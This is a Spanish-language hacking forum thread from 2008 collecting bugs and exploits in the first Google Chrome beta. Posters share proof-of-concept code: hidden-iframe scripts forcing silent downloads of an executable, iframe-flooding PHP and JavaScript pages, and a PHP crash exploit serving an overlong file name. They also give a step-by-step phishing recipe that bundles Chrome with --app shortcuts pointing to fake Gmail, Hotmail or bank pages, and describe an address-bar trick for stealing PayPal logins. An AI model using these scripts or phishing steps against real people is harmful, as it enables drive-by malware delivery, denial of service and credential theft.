Título: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 3 Septiembre 2008, 00:45 am
No se si soy yo que ando con la mala suerte pero me he encontrado con todos los contras de este nuevo explorador de google :( acá dejo el mensaje que intenté dejar en el foro de discució de google chrome pero no pude. 1. "Debates > Sugerencias > Sugerencias y problemas d google chrome" => le falta una "de" :P
2. "Error 2 (net::ERR_FAILED): Error desconocido." => Eso sucede al visitar un sitio con el protocolo FTP sin conexión, ahora cuando ingreso "http://www.noexistolalalla%27%22%3E%3Ch1%3Ea.com/" dice "Error 300 (net::ERR_INVALID_URL): Error desconocido.", claro, ahora veo que la mayoría de los errores arrojados no son definidos por el explorador pero si por la librería.
3. ¿Porque solo se lanzó para Windows y no para linux?
4. Me hace falta el botón "home" para no tener que posicionar el mouse sobre la barradel explorador y escribir.
5. Podría haber alguna compatibilidad con addons de Firefox *.xpi para utilizar mis complementos necesarios como noscript y cookiesedit?
6. al descargar un archivo me aparecen las opciones abajo pero no me da la opción de "cancelar!!" y tampoco me da la opción de cancelar todas... quepasaría si alguien me lanza una bomba de iframes hacia archivos fakes descargables? me llenaría la bandeja de descargas sin poder eliminarlas todas.
7. en los textboxs de los alerts de javascript podría dar la opción de seleccionar el texto para poder copiar y pegar en caso de que se necesite al igual que firefox en ubuntu.
------- EDITADO -------
Acabo de tener un encontrón con el explorador de google :/
Lo que hice fue pedir una url muy larga donde ovbiamente no existía y este me redireccionó hacia una pantala con el logo de google donde decía que la dirección dns no era válida, traté de ver el código fuente pero no me dejaba asi que con el botón derecho le di copiar dirección url de la imagen (logo de google) y pegué en otra pestaña y pude evr que este se localizaba en el sertvidor de google y no en mi localhost, antes de dar enter me apareció un error y se frizó causando una denegación de servicio y dandome la opción de reiniciar el explorador, no obstante me arrojó otra pantalla donde decía que no se podía cerrar la pestaña asi que me daba la opción de cerrar el explorador por completo desmintiendo el mito que decian en el video que si una pestaña fallaba entonces las demas quedaban intactas. al reiniciar este me seguía arrojando errores y ya no puedo volver a iniciarlo con normalidad. Tube que entrar con firefox :/
AppName: chrome.exe AppVer: 0.0.0.0 ModName: chrome.dll ModVer: 0.2.149.27 Offset: 0005bda6
http://img148.imageshack.us/img148/6228/error003ww1.png http://img148.imageshack.us/img148/4452/error002sp1.png
Y para rematar este foro me lanza un error y no puedo postear este tema ¬¬ tube que borrar el anterior y crearlo nuevamente. http://img386.imageshack.us/img386/8642/error004zg8.png
Probaré desintalando :( Las imagenes: (http://img148.imageshack.us/img148/6228/error003ww1.png) (http://img148.imageshack.us/img148/4452/error002sp1.png) (http://img386.imageshack.us/img386/8642/error004zg8.png) Estubo buena la idea de separar las ventanas por procesos pero el dr watson te mata el proceso padre asi que se terminan cerrando todas las pestañas por igual :xD Ahora que busco el contacto para reportar esto el sitio de google me manda a un error 404 :¬¬ y para reportar bugs debo iniciar el explorador que no quiere iniciar :¬¬ que rabia, mejor me quedo con mi firefox, es mas estable y seguro pero no mas rápido :P la estabilidad y seguridad no la transo por la rapidez, que se jodan los usuarios que les guste jugar mientras los mandan a chingar con DoS, yo prefiero ff. Editado:Cuando inicias por primera ves el chrome este te crea un archivo llamado "First Run" sin ningún contenido dentro y al reiniciarlo se iicia normal pero.. que pasa si borramos ese archivo? comienza a importar todo nuevamente y aparecen todas las vienvenidas. aunque es un poco molesto podrían haberlo hecho guardando los valores dentro del registro del sistema no? Lo bueno de acá es que puedes editar tus mensajes si quieres añadir algo o responderte :p no como en los foros de gogle que con suerte te dejan enviar un mensaje por dia XD
Título: Re: Bug en google chrome
Publicado por: Darioxhcx en 3 Septiembre 2008, 00:53 am
cuek recien salio hoy y el chabon ya estaba reportando fallos =P es un beta tmb pero buee saludos
Título: Re: Bug en google chrome
Publicado por: Eazy en 3 Septiembre 2008, 04:55 am
Por supuesto que es beta :P muchos geeks lo esperaban con la pc okm para pode buscar y buscar a maxima rapidez para ver los 3 primeros que reportaban -algo-
Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 16:34 pm
:http://evilfingers.com/advisory/google_chrome_poc.php
-berz3k.
Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 16:39 pm
Otro PoC en shortcuts de Win32Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users. 1. Wrap the Chrome browser installation in your own InstallShield. 2. Create a Phising Mirror of Gmail or what ever site you want to Phish. 3. Add Desktop Shortcuts to the InstallShield which link to. "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe" --app=http://login.live..yourfakehotmailwebsite.com 4. Build your InstallShield. 5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.
When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account. As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail. fuente :http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx
Título: Re: Bug en google chrome
Publicado por: WHK en 3 Septiembre 2008, 18:00 pm
Software: Google Chrome Browser 0.2.149.27
Tested: Windows XP Professional SP3
Result: Google Chrome Crashes with All Tabs El crash que a mi me resulta es sobre la plataforma de windows xp con sp2
Título: Re: Bug en google chrome
Publicado por: EvilGoblin en 3 Septiembre 2008, 19:08 pm
lo probe y me parecio inestable xDDDDDDDD
salio hoy? .. o.O LOL!
^^ hagamos un exploit? xD
Título: Re: Bug en google chrome
Publicado por: berz3k en 3 Septiembre 2008, 20:22 pm
Browser Automatic File DownloadExploit: <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
Alguien mas? exploits diferentes a los posteados? hagamos una lista XD fuente: securiteam.com -berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 3 Septiembre 2008, 20:28 pm
PD: Cambie el nombre del topic inicial, para mejorar el tema.
-berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: it3r en 3 Septiembre 2008, 20:42 pm
eh ...que mal xD! pero bueeno solo es un beta habra que esperar la final
saludos
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Eazy en 3 Septiembre 2008, 22:04 pm
La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 3 Septiembre 2008, 23:13 pm
Y mi ética dice que mientras mas fallas puedas reportar es mejor para el desarrollador ya que esto ayuda a fortalecer el mismo software asi como se ha hecho con firefox desde un comienzo.
Lo mejor que pudieron haber hecho es liberar su código , no tan solo para desarrollar sino para sanar bugs que podrían comprometer la integridad de todos sus usuarios finales por mas que sea beta o no.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 00:35 am
Lo mas entretenido es que en el soporte de google nadie habla ingles XD http://code.google.com/p/chromium/issues/detail?id=213 me dicen: "los técnicos solo hablan inglés" y nadie sabe que hablo :xD entonces supongo que el software fue hecho solamente para los de habla inglesa jod(http://)er! hay que explicarles con dibujos y manzanas... (http://img77.imageshack.us/img77/7306/dibujokg4.png) Bueno, sin ir mas ayá solo me molesta que no hablen español pero en cuanto al explorador en si espero que quede bién muy pronto como para salir de la etapa beta y poder utilizarlo con toda normalidad. <?php echo "Iniciando prueba del concepto por WHK probando una inundación de mensajes en la bandeja de avisos sin la posibilidad de eliminar completamente la barra perdiendo links y aumentando el uso de recursos desmedidos.<br>\n"; for($Cuenta=0;$Cuenta<900;$Cuenta++){ echo '<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" width="0" height="0" frameborder="0"></iframe>'."\n"; } ?>
Además tiene la misma falla que firefox cuando modificas la barra del explorador y cuando haces click en el espacio de trabajo sin dar enter no buelve a su estado original... por ejemplo entra a https://evil.domain/getdata.php y después ve a tu web preparada para alojar los datos de la victima https://www.paypal.com/ sin dar enter y haciendo click en cualquier parte del formulario, si dejas el explorador en ese estado cualquier persona que intente acceder a su cuenta la estará regalando (IE7 no es vulnerable pero si ayer encontré una falla donde ingresas carácteres nulos en javascript: y la url se mantiene intacta de igual forma).
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 08:11 am
vbscript:alert("XSS");
El explorador no interpreta visual basic scripts. mms://web.com/radio/
No soporta videos online con windows media video <?php echo "Prueba del concepto para probar la vulnerabilidad de Google Chrome al no reestablecer su barra de navegación al ser modificada sin ser establecido como url final.<br> \$_SERVER[HTTP_HOST] = <b>$_SERVER[HTTP_HOST] </b>" ?>
http://www.jccharry.com/pruebas/Google%20Chrome/1.php Lo visualizas y después escribes arriba "https://www.paypal.com" y son presionar enter posicionas el mouse sobre el navegador. Un atacante podría utilizarlo para robar cuentas remotamente, inclusive desde un ciber... dejas la página inicial de msn con un fake que capture contraseñas. (http://img293.imageshack.us/img293/6961/error006ck2.png) Esta falla podría ser aprobechado para un phishing facilmente. Nota: Internet Explorer no presenta ese bug.
chrome-resource://new-tab/%% En esta URL el explorador queda cargando infinitamente. chrome-resource://thumb/fake Acá el contenido no es declarado como imagen (Falta la cabezera del header!) (http://img171.imageshack.us/img171/7997/error007jr3.png) Como se imprime en texto plano, que pasaría si una imagen contiene cntenido HTML?, talves ahora no se sepa como pero con "chrome-resource" talves pueda apuntar a un archivo descargado automáticamente en formato imagen y cargarlo de la misma forma para su ejecución. PD: Google le hace publicidad a "Adobe ImageReady" :o
Claro... (http://img240.imageshack.us/img240/8919/error008fx0.png) Ovbiamente es rápido porque trabaja con multiprocesos pero eso significa utilizar casi la mitad de tus recursos queriendo decir "o navegas o usas photoshop porque acá no podrás caminar y masticar chicle al mismo tiempo"
chrome-resource://inspector Ejalee!!!! Esta página web tiene un bucle de redireccionamiento.
La página web de chrome-resource://inspector////////////////////// ha provocado demasiados redireccionamientos. Es posible que se solucione el problema si borras las cookies. Si no es así, tal vez se deba a una configuración del servidor y no a un problema con tu equipo.
A continuación se detallan algunas sugerencias: Carga esta página web de nuevo más tarde. Más información sobre este error Como decia antes, talves puedas tener acceso a la carga de archivos externos al sistema.
No se si alguien me está tirando alguna maldición :¬¬ pero el explorer no me deja visualizar lo que hay dentro de C:\Documents and Settings\Yan\Configuración local\Datos de programa\Google\Chrome\Application\0.2.149.27\Resources\Inspector\Images (http://imgcash2.imageshack.us/Himg214/scaled.php?server=214&filename=error009ol0.png&xsize=500&ysize=500) (http://img214.imageshack.us/img214/3007/error009ol0.png)
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: hkm en 4 Septiembre 2008, 08:41 am
La funcion de acceso directo a aplicaciones aparte de no mostrar en que servidor estas, tampoco muestra el estado del SSL. Esta es una invitacion a portales falsos. Un atacante (phisher) podria abusar de usuarios novatos que por ingenieria social abran un archivo malicioso (.bat o .lnk) que contenga una linea similar a: %homepath%\AppData\Local\Google\Chrome\Application\chrome.exe --app=http://www.malicioso.net/pagina-bancaria-falsa.html hkm
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: sirdarckcat en 4 Septiembre 2008, 16:14 pm
La 'Etica' dice que no se sacan advisories ni poc de programas beta.
Al contrario, se sacan para que los arreglen antes de que sea una versión estable :¬¬.. lo que sí es "mas" ético es no publicar las cosas hasta que las arreglen, pero no siempre se puede. WHK, me hubieras dicho y te ayudaba con la traducción :xD. Saludos!! PD. Un gusto verlo por aqui hakim
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: APOKLIPTICO en 4 Septiembre 2008, 18:49 pm
Ey! probablemente estes en la pista de un zero day... XD Este google chrome esta demasiado beta como para que lo use nadie... Un abrazo APOKLIPTICO
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 4 Septiembre 2008, 23:12 pm
Este google chrome esta demasiado beta como para que lo use nadie... Creeme que si google lanza un ejecutable y lo expone en su página principal lo mas seguro es que miles de personas lo ejecuten sin saber de que se trate. Tampoco creo que todos sus visitantes tengan alguna noción sobre el estado de aquel proyecto por lo cual solo se limitan a bajarlo y usarlo y ven que está rápido entonces lo siguen usando.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 5 Septiembre 2008, 00:58 am
encontré un bug un poco mas elegante :P se trata de que cuando vizualizas una web este se cierra sin decirle nada a nadie y sin dar avisos de error ni nada, simplemente se cierra y ya. http://www.jccharry.com/pruebas/Google%20Chrome/2.php :xD Como vi que este descargaba todo sin pedir confirmación pensé en dar algún tipo de archivo que no pudiese ser guardado como un "con" o un archivo con mas de 255 caracteres y ahi va el exploit: <?php /* Google Chrome 0.2.149.27 (1583) Silent Crash PoC WHK - elhacker.net */ $nombre = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.psd'; $contenido = 'prueba'; header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=$nombre"); print($contenido); /* http://www.jccharry.com/pruebas/Google%20Chrome/2.php http://foro.elhacker.net/bugs_y_exploits/recopilatorio_de_bugsexploits_en_google_chrome_win32-t226450.0.html http://milw0rm.com/exploits/6365 */ ?>
No se porqué pero al pegar la URL directamente en la barra de navegación no pasa nada pero cuando ingresas navegando entonces ahi si se cae con pestañas y todo. http://www.jccharry.com/pruebas/Google%20Chrome/ Hagan click en 2.php[editado]No cargaba al pegar la url por la codificación en urlencode"%20" pero el exploit funciona bién.[/editado] Esto no ha sido publicado en ningún otro lugar :-*
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: berz3k en 5 Septiembre 2008, 03:00 am
@WHK
En efecto, al pegar directamente en Chrome no pasa nada, pero el code funciona perfectamente, muy curioso..
-berz3k.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Micah Genji en 5 Septiembre 2008, 05:11 am
Vaya solo pense dar una vuelta por el foro para ver que opinaban sobre el nuevo explorador y a la vez lo rapido que se pudo encontrar bugs, si siguen asi en una semana quien sabe cuantos bugs vayan :)
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Littlehorse en 5 Septiembre 2008, 05:38 am
A mi la verdad que no me entra todavia en la cabeza como pudieron encontrar un bug como este :-X :-\ <script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script> Es increible que a Google se le haya pasado algo asi. Esa mania de sacar betas/alpha sin ningun minimo testeo. pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: WHK en 5 Septiembre 2008, 05:47 am
pd: Un detallito, cualquier navegador iria igual de limado que el chrome si por pestaña consumiese 20mb como me lo esta haciendo en este mismo momento :P Mi firefox anda casi igual o mas rápido porque lo manejo en prioridad alta desde el administrador de tareas mientras hago mis trabajos y eso que todavía no se instalan plugines dentro del explorador de google porque ahi si va a pesar y va a tomar mas lentitud ya que si separa cada pestaña en un proceso diferente eso significa que debe iniciar el proceso de un plugin por cada pestaña adicional. URL: about: Contenido: Google Chrome 0.2.149.27 (1583) Build oficial Google Inc. Copyright © 2006-2008 Google Inc. Todos los derechos reservados. Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 El explorador se basa en el motor de Safri y no es propio como un amigo me habia comentado. El bug encontrado anteriormente ya fue expuesto en milw0rm con este link:http://milw0rm.com/exploits/6365
javascript:Alert("test"); javascript:alert("test"); Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts: javascript:alert("test"); Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive. Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: hackeen en 5 Septiembre 2008, 07:50 am
;D ;D ;D ;D ;D ;D ;D ;D ;D ;D <html> <script> function down(){ document.write('<iframe src="file:///C:/WINDOWS/NOTEPAD.EXE" frameborder="0" width="0" height="0"></iframe>'); } setInterval("down()",200) </script> ;D ;D ;D ;D ;D ;D ;D ;D ;D ;D
Título: Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
Publicado por: Trancek en 5 Septiembre 2008, 17:16 pm
